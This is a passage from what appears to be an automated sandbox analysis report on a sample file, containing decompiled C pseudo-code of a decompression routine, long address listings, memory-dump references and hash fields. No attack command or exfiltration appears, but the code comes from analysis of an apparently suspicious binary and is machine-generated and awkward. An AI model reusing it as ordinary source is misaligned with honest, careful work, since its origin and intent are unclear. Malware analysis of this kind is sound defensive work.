                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          												 *( *(__ebp - 0x68)) = __al;
                          												__ecx =  *(__ebp - 0x14);
                          												 *(__ecx +  *(__ebp - 8)) = __al;
                          												__eax = __ecx + 1;
                          												__edx = 0;
                          												_t192 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t192;
                          												goto L80;
                          											case 0x1b:
                          												L76:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													 *(__ebp - 0x88) = 0x1b;
                          													goto L170;
                          												}
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__edx =  *(__ebp - 8);
                          												__cl =  *(__eax + __edx);
                          												__eax =  *(__ebp - 0x14);
                          												 *(__ebp - 0x5c) = __cl;
                          												 *(__eax + __edx) = __cl;
                          												__eax = __eax + 1;
                          												__edx = 0;
                          												_t275 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t275;
                          												__eax =  *(__ebp - 0x68);
                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												_t284 = __ebp - 0x64;
                          												 *_t284 =  *(__ebp - 0x64) - 1;
                          												__eflags =  *_t284;
                          												 *( *(__ebp - 0x68)) = __cl;
                          												L80:
                          												 *(__ebp - 0x14) = __edx;
                          												goto L81;
                          											case 0x1c:
                          												while(1) {
                          													L123:
                          													__eflags =  *(__ebp - 0x64);
                          													if( *(__ebp - 0x64) == 0) {
                          														break;
                          													}
                          													__eax =  *(__ebp - 0x14);
                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          													__eflags = __eax -  *(__ebp - 0x74);
                          													if(__eax >=  *(__ebp - 0x74)) {
                          														__eax = __eax +  *(__ebp - 0x74);
                          														__eflags = __eax;
                          													}
                          													__edx =  *(__ebp - 8);
                          													__cl =  *(__eax + __edx);
                          													__eax =  *(__ebp - 0x14);
                          													 *(__ebp - 0x5c) = __cl;
                          													 *(__eax + __edx) = __cl;
                          													__eax = __eax + 1;
                          													__edx = 0;
                          													_t414 = __eax %  *(__ebp - 0x74);
                          													__eax = __eax /  *(__ebp - 0x74);
                          													__edx = _t414;
                          													__eax =  *(__ebp - 0x68);
                          													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          													__eflags =  *(__ebp - 0x30);
                          													 *( *(__ebp - 0x68)) = __cl;
                          													 *(__ebp - 0x14) = _t414;
                          													if( *(__ebp - 0x30) > 0) {
                          														continue;
                          													} else {
                          														L81:
                          														 *(__ebp - 0x88) = 2;
                          														goto L1;
                          													}
                          												}
                          												 *(__ebp - 0x88) = 0x1c;
                          												goto L170;
                          										}
                          									}
                          									L171:
                          									_t535 = _t534 | 0xffffffff;
                          									goto L172;
                          								}
                          							}
                          						}
                          					}
                          					goto L1;
                          				}
                          			}













                          0x00000000
                          0x00406409
                          0x00406409
                          0x0040640d
                          0x0040641a
                          0x00406424
                          0x00000000
                          0x0040640f
                          0x0040640f
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00406453
                          0x00406453
                          0x00406456
                          0x0040645d
                          0x00406462
                          0x00406343
                          0x00406346
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x004068d2
                          0x004068da
                          0x004068e1
                          0x004068e3
                          0x004068ea
                          0x004068ee
                          0x004068ee
                          0x00406719
                          0x00406720
                          0x00406728
                          0x0040672b
                          0x0040672e
                          0x0040672e
                          0x00406734
                          0x00406734
                          0x00405ed0
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x00000000
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f49
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040604c
                          0x0040604e
                          0x00406051
                          0x004060c2
                          0x004060c5
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x004066b8
                          0x00406053
                          0x00406057
                          0x0040605a
                          0x0040605c
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406074
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x00406089
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x00406099
                          0x0040609c
                          0x004060ba
                          0x004060bc
                          0x00000000
                          0x0040609e
                          0x0040609e
                          0x004060a1
                          0x004060a4
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00000000
                          0x004060b5
                          0x00000000
                          0x004062eb
                          0x004062ef
                          0x0040630d
                          0x00406310
                          0x00406317
                          0x0040631a
                          0x0040631d
                          0x00406320
                          0x00406323
                          0x00406326
                          0x00406328
                          0x0040632f
                          0x00406330
                          0x00406332
                          0x00406335
                          0x00406338
                          0x0040633b
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x00406340
                          0x004062f1
                          0x004062f4
                          0x004062f7
                          0x00406301
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00000000
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00000000
                          0x00406398
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004063a2
                          0x004063a6
                          0x00000000
                          0x00000000
                          0x004063ac
                          0x004063ae
                          0x004063b2
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x004066b8
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x00000000
                          0x00406776
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00406734
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00406734
                          0x00406734
                          0x00000000
                          0x0040673a
                          0x00406734
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067d8
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x0040680a
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00406734
                          0x004066bb
                          0x004066b8
                          0x00000000
                          0x0040640d

                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                          • Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
                          • Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                          • Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00406355() {
                          				unsigned short _t531;
                          				signed int _t532;
                          				void _t533;
                          				signed int _t534;
                          				signed int _t535;
                          				signed int _t565;
                          				signed int _t568;
                          				signed int _t589;
                          				signed int* _t606;
                          				void* _t613;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t613 - 0x40) != 0) {
                          						 *(_t613 - 0x84) = 0xa;
                          						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                          					} else {
                          						 *(__ebp - 0x84) = 9;
                          						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          					}
                          					while(1) {
                          						 *(_t613 - 0x54) = _t606;
                          						while(1) {
                          							L133:
                          							_t531 =  *_t606;
                          							_t589 = _t531 & 0x0000ffff;
                          							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                          							if( *(_t613 - 0xc) >= _t565) {
                          								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                          								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                          								 *(_t613 - 0x40) = 1;
                          								_t532 = _t531 - (_t531 >> 5);
                          								 *_t606 = _t532;
                          							} else {
                          								 *(_t613 - 0x10) = _t565;
                          								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                          							}
                          							if( *(_t613 - 0x10) >= 0x1000000) {
                          								goto L139;
                          							}
                          							L137:
                          							if( *(_t613 - 0x6c) == 0) {
                          								 *(_t613 - 0x88) = 5;
                          								L170:
                          								_t568 = 0x22;
                          								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                          								_t535 = 0;
                          								L172:
                          								return _t535;
                          							}
                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          							L139:
                          							_t533 =  *(_t613 - 0x84);
                          							while(1) {
                          								 *(_t613 - 0x88) = _t533;
                          								while(1) {
                          									L1:
                          									_t534 =  *(_t613 - 0x88);
                          									if(_t534 > 0x1c) {
                          										break;
                          									}
                          									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                          										case 0:
                          											if( *(_t613 - 0x6c) == 0) {
                          												goto L170;
                          											}
                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          											_t534 =  *( *(_t613 - 0x70));
                          											if(_t534 > 0xe1) {
                          												goto L171;
                          											}
                          											_t538 = _t534 & 0x000000ff;
                          											_push(0x2d);
                          											asm("cdq");
                          											_pop(_t570);
                          											_push(9);
                          											_pop(_t571);
                          											_t609 = _t538 / _t570;
                          											_t540 = _t538 % _t570 & 0x000000ff;
                          											asm("cdq");
                          											_t604 = _t540 % _t571 & 0x000000ff;
                          											 *(_t613 - 0x3c) = _t604;
                          											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                          											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                          											_t612 = (0x300 << _t604 + _t609) + 0x736;
                          											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                          												L10:
                          												if(_t612 == 0) {
                          													L12:
                          													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                          													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          													goto L15;
                          												} else {
                          													goto L11;
                          												}
                          												do {
                          													L11:
                          													_t612 = _t612 - 1;
                          													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                          												} while (_t612 != 0);
                          												goto L12;
                          											}
                          											if( *(_t613 - 4) != 0) {
                          												GlobalFree( *(_t613 - 4));
                          											}
                          											_t534 = GlobalAlloc(0x40, 0x600); // executed
                          											 *(_t613 - 4) = _t534;
                          											if(_t534 == 0) {
                          												goto L171;
                          											} else {
                          												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                          												goto L10;
                          											}
                          										case 1:
                          											L13:
                          											__eflags =  *(_t613 - 0x6c);
                          											if( *(_t613 - 0x6c) == 0) {
                          												 *(_t613 - 0x88) = 1;
                          												goto L170;
                          											}
                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                          											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          											_t45 = _t613 - 0x48;
                          											 *_t45 =  *(_t613 - 0x48) + 1;
                          											__eflags =  *_t45;
                          											L15:
                          											if( *(_t613 - 0x48) < 4) {
                          												goto L13;
                          											}
                          											_t546 =  *(_t613 - 0x40);
                          											if(_t546 ==  *(_t613 - 0x74)) {
                          												L20:
                          												 *(_t613 - 0x48) = 5;
                          												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                          												goto L23;
                          											}
                          											 *(_t613 - 0x74) = _t546;
                          											if( *(_t613 - 8) != 0) {
                          												GlobalFree( *(_t613 - 8));
                          											}
                          											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                          											 *(_t613 - 8) = _t534;
                          											if(_t534 == 0) {
                          												goto L171;
                          											} else {
                          												goto L20;
                          											}
                          										case 2:
                          											L24:
                          											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                          											 *(_t613 - 0x84) = 6;
                          											 *(_t613 - 0x4c) = _t553;
                          											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                          											 *(_t613 - 0x54) = _t606;
                          											goto L133;
                          										case 3:
                          											L21:
                          											__eflags =  *(_t613 - 0x6c);
                          											if( *(_t613 - 0x6c) == 0) {
                          												 *(_t613 - 0x88) = 3;
                          												goto L170;
                          											}
                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          											_t67 = _t613 - 0x70;
                          											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                          											__eflags =  *_t67;
                          											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          											L23:
                          											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                          											if( *(_t613 - 0x48) != 0) {
                          												goto L21;
                          											}
                          											goto L24;
                          										case 4:
                          											L133:
                          											_t531 =  *_t606;
                          											_t589 = _t531 & 0x0000ffff;
                          											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                          											if( *(_t613 - 0xc) >= _t565) {
                          												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                          												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                          												 *(_t613 - 0x40) = 1;
                          												_t532 = _t531 - (_t531 >> 5);
                          												 *_t606 = _t532;
                          											} else {
                          												 *(_t613 - 0x10) = _t565;
                          												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                          											}
                          											if( *(_t613 - 0x10) >= 0x1000000) {
                          												goto L139;
                          											}
                          										case 5:
                          											goto L137;
                          										case 6:
                          											__edx = 0;
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x34) = 1;
                          												 *(__ebp - 0x84) = 7;
                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          												while(1) {
                          													 *(_t613 - 0x54) = _t606;
                          													goto L133;
                          												}
                          											}
                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          											__esi =  *(__ebp - 0x60);
                          											__cl = 8;
                          											__cl = 8 -  *(__ebp - 0x3c);
                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          											__ecx =  *(__ebp - 0x3c);
                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          											__ecx =  *(__ebp - 4);
